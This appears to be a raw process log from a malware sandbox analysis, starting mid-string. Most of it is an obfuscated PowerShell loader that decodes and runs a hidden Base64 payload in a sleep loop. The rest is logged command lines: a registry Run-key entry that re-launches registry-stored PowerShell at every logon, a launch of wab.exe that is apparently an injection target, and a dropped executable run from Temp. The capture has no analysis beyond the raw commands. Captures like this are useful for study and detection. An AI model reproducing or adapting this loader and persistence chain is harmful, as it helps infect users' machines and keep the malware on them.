el EoRaa d.eF,oiP lVae .(Ep$HiU .nFoiFulTiaFutC e .r SaD,lSaeG ,Co$t.M aoB,nL.d ungai tKueP tVe),s ';$Mondnitet=$Nyhedsformidlingerne[0];Quatrible (Placque 'St$BagB.lReoAub Ra Sl,l:SkS .yTos it FeGemTyi .sVie HrBi= (A T KeDes ctHo-KvPAlaOrtMeh.n Vo$P M.ooMinakdBln,aiG t,aeLyt.r)Ap ');while (!$Systemiser) {Quatrible (Placque ' O$stgPelShoknb aBel i:CoRw,aUnpCos uo Dd MiSpeKar E=Ud$ Rt srKouHoeUr ') ;Quatrible $Vitriners;Quatrible (Placque 'F,S.ct SaMer.ctP.-.aSA lKoeK,eP,p V Na4di ');Quatrible (Placque 'Th$ hgfalF oUdbb,aP,lAl:FiSSty.hs EtT,e ,m oiQ s JeBerTr=Ri(ErTk,eCosgetPa-KeP.ua.nt MhF. .$NeM aoHenUdd UnFaiCltW,e Ot.r) I ') ;Quatrible (Placque 'Ve$Prg.ulSaoRyb.iaOvlD :AlDBre cvei BmenaTel lt ta Eb Eu.ilP.eCor Ce.anFrdCoe,ys T=.e$h,g .lCooDibFaaRelC,:P.UGrnFod,esCie BeAflCoiUdg FeSi+ N+Fo% $,rflar Me EeDel.eaUnn Ec.de ,j .o .uKlr.lnHoaR.l oi sEctOme.orEf.sucPuoJuuEmnTjtS. ') ;$Unilaterale=$freelancejournalister[$Decimaltabulerendes];}$Stavelsesantallets=321844;$Kopimaskine=26918;Quatrible (Placque '.n$LegKulGro GbRaaBal.a: MSHrk uM,lOvdS,e ,rKosWat,irTroH,ps Mo=Va HuGdeebytSi-.rC,eo ,n,et.beRanu.t r$B.MKyoSanAkdErnaniPat,oe ,t R ');Quatrible (Placque ' .$Blglel,uoDrbHya,pl .:SgTMei ClBehBroF e Vr,xeHi S,=St F [.iS iys.s et ,eMamVu. SCMeo .n AvEne .rUntu ]Co:Gr:FoF,irFuo m PBekaU sBeeMi6La4T.SFotF,r.niWen NgCy( t$PaSBikSnu,flQ.dHyeS rHesuntGrrSpoFepPr) c ');Quatrible (Placque ' y$AfgArlOmoStb.oaM l S:NeB aeQus at,ri FaStlC,sFl1fr0Bu5Ti Pa= kv[OmSSlyPhs BtAce,am a.FeT .eA.x Rt A.PlEBanEncOvo ,dR.i knSkgPi]Sp:Pa:T A RSS,C LI LII..EnGReeFotj.SovtvirPyi,enfagAk(Pe$ TTDyi lK,hTao FeT rCoeP ) ');Quatrible (Placque 'Me$BagaalF.oFobOcaSllGe:W KFlaDubVaeTalP lCogHjnC,i enDeg.a= R$ uBkre CsPot SiS,aGolRusKo1Te0S,5 P. ns SuRobD s ,t.er,xi SnKig (J.$B,S RtgaaArv,peB l,tsFlerasG a.en,rtInaJ.lRelToe,itArsP,,Ci$ImKNeoCepAbibam.maB,sVakEfi yn,keFo)Ep ');Quatrible $Kabellgning;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kdfars211.Arb && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Datakopierings" /t REG_EXPAND_SZ /d "%Revolutionary% -w 1 $Nonetheless=(Get-ItemProperty -Path 'HKCU:\Cornaceous\').Gonid;%Revolutionary% ($Nonetheless)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Datakopierings" /t REG_EXPAND_SZ /d "%Revolutionary% -w 1 $Nonetheless=(Get-ItemProperty -Path 'HKCU:\Cornaceous\').Gonid;%Revolutionary% ($Nonetheless)"

C:\Users\Admin\AppData\Local\Temp\junexw.exe

"C:\Users\Admin\AppData\Local\Temp\junexw.exe"